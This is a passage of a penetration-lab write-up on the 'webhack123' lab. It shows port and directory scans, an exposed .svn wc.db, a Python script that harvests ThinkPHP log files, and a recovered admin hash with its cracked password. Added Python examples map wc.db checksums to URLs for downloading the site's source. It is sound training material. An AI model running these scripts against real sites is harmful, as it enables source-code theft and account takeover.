<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21094"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.12.cobaltstrike </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">制作黄金<span lang="EN-US">票据</span></span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21094 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">41</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21095"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6. FLAG </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>......................................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21095 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">43</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21096"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.1. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">web flag1</span><span style="color:black;text-decoration:none;text-underline:none;"><span>............................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21096 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">43</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21097"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.2. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">web flag2</span><span style="color:black;text-decoration:none;text-underline:none;"><span>............................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21097 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">44</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21098"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.3. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc flag3</span><span style="color:black;text-decoration:none;text-underline:none;"><span>.................................................................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21098 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">44</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21099"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">7. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">关注</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21099 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">44</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:8.0pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<!--><span lang="EN-US"><span style="mso-element:field-end;"></span></span><!--><span lang="EN-US"> </span>
</p>
</w:sdt>
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:19.35pt;margin-left:-.25pt;">
<a name="_Toc21038"></a><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">1. </span>Environment overview<span lang="EN-US"></span>
</h1>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:4.1pt;margin-left:-.25pt;">
<a name="_Toc21039"></a><span lang="EN-US">1.1.</span><span><span style="font-family:黑体;font-weight:normal;">Internal network penetration lab</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:26.1pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<img width="554" height="253" src="https://www.2k8.org/content/uploadfile/202203/17/c227cdbf.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:49.35pt;margin-left:-.25pt;margin-right:91.4pt;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The lab is webhack123. The </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">WEB </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">server has two network interfaces, and </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">is the domain controller. This write-up is a technical training document, so newcomers may find parts of the process hard to follow. The path runs from </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">kali </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">to the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">web </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">server and then into the internal network to </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">, that is, from the external network all the way to the domain controller.</span><span lang="EN-US"></span>
</p>
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:19.35pt;margin-left:-.25pt;">
<a name="_Toc21040"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">2.</span></b>Information gathering<span lang="EN-US"></span>
</h1>
<h2 style="margin-left:-.25pt;">
<a name="_Toc21041"></a><span lang="EN-US">2.1.masscan </span><span><span style="font-family:黑体;font-weight:normal;">port scan</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:22.95pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">masscan -p 1-65535 192.168.0.150 --rate=1000</span><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:14.75pt;margin-left:-.25pt;">
<a name="_Toc21042"></a><span lang="EN-US">2.2.nmap </span><span><span style="font-family:黑体;font-weight:normal;">OS and service version detection</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">nmap -p 3306,49154,80,47001,49157,139,49153,445,135,49155,49156,49152 -A 192.168.0.150 -oA webhack</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:10.6pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="293" src="https://www.2k8.org/content/uploadfile/202203/17/fc4b417f.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:48.15pt;margin-left:-.25pt;margin-right:87.2pt;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">From the port scan results we learn that the target is the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">WEB </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">server, the web stack is the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">phpstudy </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">bundle, and the operating system is </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Microsoft Windows Server 2008 R2</span><span lang="EN-US"></span>
</p>
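<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
The scan output in the screenshot has to be turned into an inventory before anyone can act on it. The Python script below is an added example, not part of the original write-up: it parses the greppable file that -oA webhack produces (webhack.gnmap), lists the open ports with their service versions, and flags the ports that should not be reachable on an internet-facing web server. The sample scan text and the port policy inside it are constructed for the example and are not the lab's real scan result.
</p>

```python
import re
from typing import Dict, List

# Constructed sample of the greppable file written by `-oA webhack` (webhack.gnmap).
# Service and version strings are placeholders, not the real result from this lab.
SAMPLE_GNMAP = "\n".join([
    "# Nmap 7.92 scan initiated as: nmap -p 80,135,139,445,3306 -A 192.168.0.150 -oA webhack",
    "Host: 192.168.0.150 ()\tStatus: Up",
    "Host: 192.168.0.150 ()\tPorts: "
    "80/open/tcp//http//Apache httpd 2.4.39/, "
    "135/open/tcp//msrpc//Microsoft Windows RPC/, "
    "139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, "
    "445/open/tcp//microsoft-ds//Microsoft Windows Server 2008 R2 microsoft-ds/, "
    "3306/open/tcp//mysql//MySQL (unauthorized)/"
    "\tOS: Microsoft Windows Server 2008 R2",
    "# Nmap done -- 1 IP address (1 host up) scanned",
])

# Constructed policy: services that a public-facing web server should not expose.
INTERNAL_ONLY_PORTS = {135: "MS-RPC", 139: "NetBIOS", 445: "SMB", 3306: "MySQL"}


def parse_gnmap(text: str) -> Dict[str, dict]:
    """Parse 'Host:' lines into {ip: {"ports": [...], "os": str or None}}.

    Fields on a host line are tab separated. Inside the Ports: field each entry is
    port/state/proto/owner/service/rpc/version/ and entries are joined by ', ';
    nmap writes '|' in place of '/' inside those text fields, so splitting on '/'
    is safe.
    """
    hosts: Dict[str, dict] = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        entry = hosts.setdefault(ip, {"ports": [], "os": None})
        for field in fields[1:]:
            if field.startswith("Ports: "):
                # split only where the next entry (a port number and a slash) begins
                for item in re.split(r", (?=\d+/)", field[len("Ports: "):]):
                    parts = item.split("/")
                    if len(parts) >= 7:
                        port, state, proto, _owner, service, _rpc, version = parts[:7]
                        if state == "open":
                            entry["ports"].append(
                                {"port": int(port), "proto": proto,
                                 "service": service, "version": version}
                            )
            elif field.startswith("OS: "):
                entry["os"] = field[len("OS: "):]
    return hosts


def exposure_findings(hosts: Dict[str, dict]) -> List[str]:
    """Report open ports that, under the constructed policy, belong on the internal side only."""
    findings = []
    for ip, entry in hosts.items():
        for p in entry["ports"]:
            if p["port"] in INTERNAL_ONLY_PORTS:
                label = INTERNAL_ONLY_PORTS[p["port"]]
                detail = p["version"] or p["service"]
                findings.append(f"{ip}:{p['port']} {label} reachable from the scanner ({detail})")
    return findings


if __name__ == "__main__":
    import sys
    # Pass the path of a real .gnmap file as the only argument, or run on the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    hosts = parse_gnmap(text)
    for ip, entry in hosts.items():
        print(ip, entry["os"] or "OS unknown")
        for p in entry["ports"]:
            print(f"  {p['port']}/{p['proto']} {p['service']} {p['version']}".rstrip())
    for f in exposure_findings(hosts):
        print("finding:", f)
```

<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
-oA also writes the .nmap and .xml forms; the greppable one is the easiest to feed into a script like this. The findings list is the point for the defender: on this lab the RPC, NetBIOS, SMB and MySQL ports are all reachable from the scanning host, and everything later in the write-up builds on exactly that exposure.
</p>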
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:19.35pt;margin-left:-.25pt;">
<a name="_Toc21043"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">3.</span></b>Security testing of the website<span lang="EN-US"></span>
</h1>
<h2 style="margin-left:-.25pt;">
<a name="_Toc21044"></a><span lang="EN-US">3.1.</span><span><span style="font-family:黑体;font-weight:normal;">Bind </span><span lang="EN-US">hosts</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:1.2pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">192.168.0.150 </span><span lang="EN-US"><a href="http://www.webhack123.com/"><span style="color:blue;font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">www.webhack123.com</span></a></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">We find that </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">www.webhack123.com </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">is an </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">xxx </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">platform whose core framework is </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ThinkPHP_3.1.3</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The location of the admin backend is not yet known.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<img width="553" height="285" src="https://www.2k8.org/content/uploadfile/202203/17/97e8d710.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
<a name="_Toc21045"></a><span lang="EN-US">3.2.gobuster </span><span><span style="font-family:黑体;font-weight:normal;">directory and file scan</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">gobuster dir -u http://www.webhack123.com -w /usr/share/wordlists/dirb/big.txt</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:21.75pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="311" src="https://www.2k8.org/content/uploadfile/202203/17/78b00c8a.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.15pt;margin-left:-.25pt;">
<a name="_Toc21046"></a><span lang="EN-US">3.3.svn </span><span><span style="font-family:黑体;font-weight:normal;">source code disclosure vulnerability</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">.svn</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;"> exists, so the source tree could in principle be enumerated through it, but the attempt fails here.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="327" src="https://www.2k8.org/content/uploadfile/202203/17/693bb28a.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.0pt;margin-left:-.25pt;">
<a name="_Toc21047"></a><span lang="EN-US">3.4.wc.db </span><span><span style="font-family:黑体;font-weight:normal;">file download</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.55pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">This <span lang="EN-US">sqlite</span> database file holds the directory and file listing of the site's working copy.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.55pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">If the working copy cannot be pulled through the <span lang="EN-US">svn</span> client, download <span lang="EN-US">wc.db</span> from the <span lang="EN-US">.svn</span> directory and open it with <span lang="EN-US"> sqlitebrowser wc.db</span>.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Download <span lang="EN-US">http://www.webhack123.com/.svn/wc.db</span></span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:13.8pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="108" src="https://www.2k8.org/content/uploadfile/202203/17/91f1797a.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:9.8pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="355" src="https://www.2k8.org/content/uploadfile/202203/17/9d70fa11.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:40.85pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Browsing the database gives a fairly complete picture of the site's layout.</span><span lang="EN-US"></span>
</p>
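<p>The Python below is an added example, not part of the original write-up, showing what to pull out of a downloaded <code>wc.db</code> without a GUI. It reads the <code>NODES</code> table that SVN 1.7+ working copies keep and turns each file's SHA-1 checksum into the URL of its pristine copy under <code>.svn/pristine/</code>, which is how the committed source (PHP included) can be fetched even when the <code>.svn/</code> directory listing itself is blocked. The sample database is constructed inline with only the three columns the queries need; the column names and the pristine path scheme are those of real <code>wc.db</code> files, but the file names and checksums are made up.</p>

```python
import sqlite3

# Constructed sample rows in the shape of the NODES table of an SVN 1.7+ wc.db.
# Real files carry many more columns; only the three queried below are modelled.
# The checksums are made up and are not hashes of real files.
SAMPLE_NODES = [
    ("", "dir", None),
    ("index.php", "file", "$sha1$2aae6c35c94fcfb415dbe95f408b9ce91ee846ed"),
    ("App/Conf/config.php", "file", "$sha1$da39a3ee5e6b4b0d3255bfef95601890afd80709"),
    ("App/Runtime", "dir", None),
    ("App/Runtime/Logs/19_06_29.log", "file", "$sha1$a9993e364706816aba3e25717850c26c9cd0d89d"),
]


def open_wcdb(path):
    """Open a wc.db pulled from the target (e.g. http://host/.svn/wc.db)."""
    return sqlite3.connect(path)


def build_sample_wcdb():
    """Build an in-memory stand-in for a downloaded wc.db so the script runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE NODES (wc_id INTEGER, local_relpath TEXT, op_depth INTEGER, "
        "kind TEXT, checksum TEXT)"
    )
    conn.executemany("INSERT INTO NODES VALUES (1, ?, 0, ?, ?)", SAMPLE_NODES)
    conn.commit()
    return conn


def pristine_url(base_url, checksum):
    """Map a wc.db checksum ('$sha1$<hex>') to the pristine copy holding the file content."""
    sha1 = checksum.rsplit("$", 1)[-1]
    # Pristine copies live at .svn/pristine/<first two hex chars>/<sha1>.svn-base
    return f"{base_url}/.svn/pristine/{sha1[:2]}/{sha1}.svn-base"


def list_source_files(conn, base_url):
    """Return (relative path, pristine URL) for every file node, sorted by path.

    Directories have no checksum and are skipped; fetching a pristine URL
    returns the committed content of that file.
    """
    rows = conn.execute(
        "SELECT local_relpath, checksum FROM NODES "
        "WHERE kind = 'file' AND checksum IS NOT NULL ORDER BY local_relpath"
    ).fetchall()
    return [(relpath, pristine_url(base_url, checksum)) for relpath, checksum in rows]


def list_directories(conn):
    """Return the directory tree recorded in the working copy (the site layout)."""
    rows = conn.execute(
        "SELECT local_relpath FROM NODES WHERE kind = 'dir' AND local_relpath != '' "
        "ORDER BY local_relpath"
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = build_sample_wcdb()  # use open_wcdb("wc.db") for a real download
    for d in list_directories(db):
        print("dir ", d)
    for relpath, url in list_source_files(db, "http://www.webhack123.com"):
        print("file", relpath, "->", url)
```

<p>The directory list is what the author reads off in sqlitebrowser; the pristine URLs are the part worth automating, since each one serves the file's committed content. Note that this layout only exists for SVN 1.7 and later; older <code>.svn</code> directories keep per-directory <code>entries</code> files and <code>text-base/</code> copies instead, and need a different parser.</p>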
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.0pt;margin-left:-.25pt;">
<a name="_Toc21048"></a><span lang="EN-US">3.5. thinkphp </span><span><span style="font-family:黑体;font-weight:normal;">log file disclosure</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:70.5pt;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">In <span lang="EN-US">ThinkPHP_3.1.3</span> logging is enabled by default, and <span lang="EN-US">wc.db</span> has already revealed the directory layout, so the location of the log files is known:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:39.75pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">http://www.webhack123.com/App/Runtime/Logs/19_06_29.log</span><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
<a name="_Toc21049"></a><span lang="EN-US">3.6. python </span><span><span style="font-family:黑体;font-weight:normal;">script to fetch the log files</span></span><span lang="EN-US"></span>
</h2>
<pre style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;margin-left:-.25pt;">
#coding:utf-8
import requests

# Log directory revealed by wc.db; ThinkPHP 3.1.x names its daily logs YY_MM_DD.log
url = "http://www.webhack123.com/App/Runtime/Logs"

def add_urls(patch, y):
    # Build candidate log names for months 1-6 and days 1-31 of the two-digit year y;
    # %02d zero-pads month and day, matching the 19_06_29.log naming seen above
    urls = []
    for i in range(1, 7):
        for j in range(1, 32):
            urls.append(patch + "/%s_%02d_%02d.log" % (y, i, j))
    return urls

urls = add_urls(url, "20")

for i in urls:
    req = requests.get(i)
    if req.status_code == 200:
        print(i)
        html = req.text
        # Append every log that exists to one local file for offline grepping
        with open("webhack123.txt", 'a', encoding='utf-8') as f:
            f.write(html)
</pre>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Output of running it:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:36.95pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="686" src="https://www.2k8.org/content/uploadfile/202203/17/7d5f68c5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.55pt;margin-left:-.25pt;">
<a name="_Toc21050"></a><span lang="EN-US">3.7. </span><span><span style="font-family:黑体;font-weight:normal;">Finding the admin password hash</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Older <span lang="EN-US" style="font-family:Segoe UI,sans-serif;">thinkphp</span> versions write password-change operations, including the new hash, to the log.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:11.55pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="63" src="https://www.2k8.org/content/uploadfile/202203/17/af0e5ee0.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Account </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">admin</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">, hash </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">74c774ef39b5b977c1fd59dbfc73c3e380a65aa3</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:7.95pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="155" src="https://www.2k8.org/content/uploadfile/202203/17/1b075e26.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:39.05pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Looked up on </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">somd5</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">, it resolves to </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">web123</span><span lang="EN-US"></span>
</p>
